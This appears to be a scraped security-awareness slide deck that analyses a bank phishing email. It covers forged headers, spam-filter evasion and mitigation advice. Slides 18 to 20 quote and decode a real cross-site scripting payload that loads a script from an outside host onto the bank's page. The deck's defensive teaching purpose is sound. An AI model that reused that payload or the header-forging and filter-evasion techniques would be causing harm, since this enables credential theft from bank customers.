Download - Deconstructing A Phishing Scheme
![Page 1: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/1.jpg)
Deconstructing
A Phishing Scheme
Christopher Duffy, CISSP
![Page 2: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/2.jpg)
Agenda• Definition• Examples• Breakdown• Follow Through• Statistics• Sites
![Page 3: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/3.jpg)
Defined
"phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“
-Wikipedia
![Page 4: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/4.jpg)
![Page 5: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/5.jpg)
![Page 6: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/6.jpg)
Catching a Phish
• Complete Attack • 1st effort to use clients as relay• Cross- Site Scripting Attack– email was not sent from the bank.– e web page it linked to contained extra characters in
the URL address line - added on to the bank’s legitimate web address
– page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.
![Page 7: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/7.jpg)
Email Breakdown
• Header Info– Incorrect Return Address
Return-Path: [email protected] The return address is generated from the From: address
and applied by the final SMTP server to handle the message.
– Most scams forge the From: address. – This can be the only obfuscation a phisher employs; – forging From: headers is a trivial task, and is often a
feature of normal client mail user agents.
![Page 8: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/8.jpg)
True Received: Header
• Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) – Received: headers are written in reverse; in this case, 82.67.84.75
is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy
– Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher
![Page 9: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/9.jpg)
Forged Received: Header
• Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.4416.5263)– This Received: line is forged. Some anti-spam software will trust the
Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique.
– Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “[email protected]” string in the fake server name; normal server names cannot have @-signs in their name.
– The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.
![Page 10: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/10.jpg)
Incorrect Time Stamp
• Tue, 12 Nov 2008 07:12:03 -0100 – Timestamp Most Likely From a Comprimised PC• (Out of Sync Clock)
![Page 11: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/11.jpg)
• Forged From: Name and Address– From: Suntrust Billing [email protected]
• the forged From: field is reflected in the Return-Path field
– Most Likely a True email within Suntrust
• Impersonal To: Name, if Any– To: Valued Suntrust Customer ,or– To:[email protected]– No Salutation
![Page 12: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/12.jpg)
Threats
• Account Compromised• Suspension• Upgrades in the Name of Security
– Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.
Proceed to customer service department>>
![Page 13: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/13.jpg)
No RTF
• HTML-only messageContent-Type: text/html;– Delivered in HTML only, no RTF, or plain text.– Mail User Agent (MUA) Compatibility
![Page 14: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/14.jpg)
What???
• Spurious Random Words
Content-Description: lonesome hysteria ulterior• Randomizer to avoid Bayesian Spam Filters
![Page 15: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/15.jpg)
Hijacked
• Use of Trusted Logo’s & Images• Linked Directly to Site• Sense of Legitimacy
![Page 16: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/16.jpg)
ESL• Phishing activity outside US= Non Native• Origination of Phishing & Spam– Countries Hosting Phishing Sites Q1 2008• Russia 11.66• China 10.3• Germany 5.64• Romania 5.09
![Page 17: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/17.jpg)
XSS
• Cross Site Scripting Attacks– Cross site scripting (also known as XSS) occurs
when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.
![Page 18: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/18.jpg)
XSS Deconstruction<a title=3D"http://suntrust.com/" target=3D"_blank"
herf=3D"http://www.sun=trust.com/onlinestatements/index.asp?
AccountVerify=3Ddf4g653432fvfdsGFSg45=wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E
%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br>
• SCREEN TIP TARGET OBSFUCATION<a title=3D"http://suntrust.com/" target=3D"_blank“Mouse Over to distract from real target link
![Page 19: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/19.jpg)
XSS Payload
• Link to True Siteherf=3D"http://www.sun=trust.com/onlinestatements/index.asp?
AccountVerify=3Ddf4g653432fvfdsGFSg45=Link target is Suntrust, following is XSS Payload (HEX)• wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo
=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>
![Page 20: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/20.jpg)
HEX DeCoded
• Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascript src="http://218.103.23.138:8081/sun/sun.js"</SCRIPT>
• Link Executes sun.js• 218.103.23.138 Resolves to ISP in Hong Kong
![Page 21: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/21.jpg)
Top Phishing
• Keyloggers & Maclious Code, up 93% from ’07• ISP’s• IRS
![Page 22: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/22.jpg)
Mitigation Through Education
– Don’t click to Follow– Don’t trust Links– No Personal Information via email– Check out the URL– Let your Fingers Do the Walking
Type it In !
![Page 23: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/23.jpg)
SecurityCartoon.com
![Page 24: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/24.jpg)
More Information
• Internet Crime Centerwww.ic3.gov• Identity Theft: What to do if It Happens to Youhttp://www.privacyrights.org/fs/fs17a.htm• Federal Trade Commission phishing informationhttp://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm• Video tutorial on phishing:http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php• Microsoft Phishing Information Websitehttp://www.microsoft.com/protect/yourself/phishing/identify.mspx
![Page 25: Deconstructing A Phishing Scheme](https://reader033.vdocuments.us/reader033/viewer/2022061203/547d494bb4af9fda158b535d/html5/thumbnails/25.jpg)
• Anti-Phishing Non Profit Siteswww.antiphishing.org• www.apwg.com• www.bestsecuritytips.com• www.cyberstreet.org• Carnigie Mellon University Gamehttp://cups.cs.cmu.edu/antiphishing_phil/new/index.html